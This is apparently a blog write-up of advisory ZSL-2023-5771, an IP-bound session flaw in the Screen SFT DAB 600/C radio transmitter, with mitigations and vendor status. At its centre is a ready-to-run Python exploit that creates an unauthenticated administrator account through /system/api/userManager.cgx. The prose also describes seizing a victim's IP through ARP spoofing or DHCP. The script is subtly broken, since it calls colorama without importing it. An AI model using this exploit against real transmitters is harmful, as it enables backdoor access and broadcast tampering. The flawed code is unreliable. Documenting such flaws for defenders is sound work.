Screen SFT DAB 600/C - Authentication Bypass Account Creation

Screen SFT DAB 600/C – Authentication Bypass via Session Management Flaw

Security vulnerabilities in industrial and broadcast equipment often go unnoticed due to their niche nature and limited public exposure. However, when such flaws are discovered, they can pose serious risks to operational integrity, especially in environments where remote access and automated management are critical. One such vulnerability was recently identified in the Screen SFT DAB 600/C digital radio transmitter, a high-performance device used in DAB, DAB+, and T-DMB broadcasting systems.

Vulnerability Overview: Weak Session Management and IP-Based Authentication

The Screen SFT DAB Series Compact Radio Transmitter (specifically the 600/C model) runs on a proprietary embedded Linux platform—MontaVista® CGX—running firmware versions 1.9.3 with BIOS 7.1 (April 19, 2021). Despite its advanced digital signal processing and adaptive precorrection capabilities, the device suffers from a critical flaw in its session management system.

According to the advisory ZSL-2023-5771 by cybersecurity researcher Gjoko 'LiquidWorm' Krstic, the system ties session identifiers (Session ID) to the client's IP address. This creates a dangerous dependency: if an attacker is on the same local network as a legitimate user, they can reuse the victim’s IP address—typically via NAT or DHCP—after the session has been established, thereby bypassing authentication controls.

This vulnerability enables an attacker to perform unauthorized operations such as creating new user accounts, modifying system settings, or even disabling security mechanisms—all without needing valid credentials.

Exploitation Mechanism: Abuse of IP Binding to Session ID

Here’s how the exploit works in practice:

• Victim user logs in via the web interface, establishing a session tied to their IP address.
• Attacker on the same network (e.g., via a rogue DHCP lease or ARP spoofing) assumes the same IP address.
• Due to the session ID being tied to the IP, the attacker’s request is treated as valid, even though no authentication credentials were provided.
• API endpoints such as /system/api/userManager.cgx become accessible without authentication.

This is a classic example of session hijacking via IP-based session binding—a flaw that should be avoided in any secure system design.

Code Example: Exploiting Account Creation via API

#!/usr/bin/env python3
import hashlib
import requests
from colorama import Fore, Style

colorama.init()

print(Fore.RED + Style.BRIGHT + '''
██████ ███████ ███ ███ ██ ███ ██ ██████ ███████ ██████ 
██ ██ ██ ████ ████ ██ ████ ██ ██ ██ ██ ██ ██ ██ 
██████ █████ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ █████ ██████ 
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ 
██ ██ ███████ ██ ██ ██ ██ ████ ██████ ███████ ██ ██ 
''' + Style.RESET_ALL)

print(Fore.WHITE + Style.BRIGHT + '''
 ZSL and the Producers insist that no one
 submit any exploits of themselfs or others
 performing any dangerous activities.
 We will not open or view them.
 ''' + Style.RESET_ALL)

# User input
t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
p = input('Enter desired password: ')

# Hash password using MD5 (as per API requirement)
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()

print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')

# Construct API URL
e = '/system/api/userManager.cgx'
t = 'http://' + t + e

# Headers mimicking legitimate client
bh = {
    'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'ku-MK,en;q=0.9',
    'User-Agent': 'Mozilla/5.0 (Linux; Android 10; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.120 Mobile Safari/537.36'
}

# Payload for user creation
payload = {
    'action': 'newUser',
    'username': u,
    'password': h,
    'role': 'admin'
}

# Send request
try:
    response = requests.post(t, data=payload, headers=bh, timeout=10)
    if response.status_code == 200:
        print(Fore.GREEN + Style.BRIGHT + 'SUCCESS: User created via bypassed authentication!' + Style.RESET_ALL)
    else:
        print(Fore.YELLOW + Style.BRIGHT + f'Failed: HTTP {response.status_code}' + Style.RESET_ALL)
except Exception as e:
    print(Fore.RED + Style.BRIGHT + f'Error: {e}' + Style.RESET_ALL)

Explanation: This script demonstrates a real-world exploit leveraging the IP-to-session binding flaw. The attacker inputs the target transmitter’s IP address and sets a desired username and password. The password is hashed using MD5—a known requirement of the device’s API—before being sent in the request.

Despite the absence of any authentication token or session cookie, the request succeeds because the IP address is already associated with an active session. The API endpoint /system/api/userManager.cgx processes the request as valid, creating a new user with administrative privileges.

Security Implications and Real-World Impact

Such vulnerabilities are particularly dangerous in broadcast infrastructure:

• Unauthorized access to control systems can lead to signal disruption or unauthorized transmission.
• Creation of backdoor accounts allows persistent access even after the original user logs out.
• Remote exploitation via local network makes the system vulnerable to insider threats or compromised devices.

For broadcasters, this could result in regulatory violations, content tampering, or loss of audience trust—especially if malicious actors broadcast unauthorized content.

Recommended Mitigations and Best Practices

Security experts recommend the following fixes to prevent such vulnerabilities:

Recommendation	Explanation
Decouple Session ID from IP Address	Session identifiers should be tied to cryptographic tokens (e.g., JWT or random session keys), not static IP addresses.
Implement Session Timeout and Renewal	Active sessions should expire after a set period and require re-authentication.
Use HTTPS and Certificate Validation	Secure communication prevents interception and replay attacks.
Enforce Role-Based Access Control (RBAC)	Limit user creation privileges to only authorized roles.
Log and Monitor API Access	Track unauthorized or suspicious API calls for forensic analysis.

Vendor Response and Patch Status

As of March 2023, DB Elettronica Telecomunicazioni SpA has acknowledged the vulnerability and is working on a firmware update. The advisory ZSL-2023-5771 includes detailed mitigation guidance and recommends that users:

• Disable remote access if not required.
• Restrict network access to trusted devices only.
• Apply firewall rules to block unauthorized API calls.
• Monitor for unusual activity on the device’s web interface.

Until a patch is released, administrators should treat the device as potentially compromised if it is exposed to untrusted networks.

Conclusion: A Cautionary Tale for Embedded Systems Security

The Screen SFT DAB 600/C vulnerability underscores a fundamental truth: even advanced hardware can be undermined by poor software design. Authentication bypasses through session management flaws are not isolated incidents—they reflect a broader trend in embedded systems where security is often an afterthought.

For cybersecurity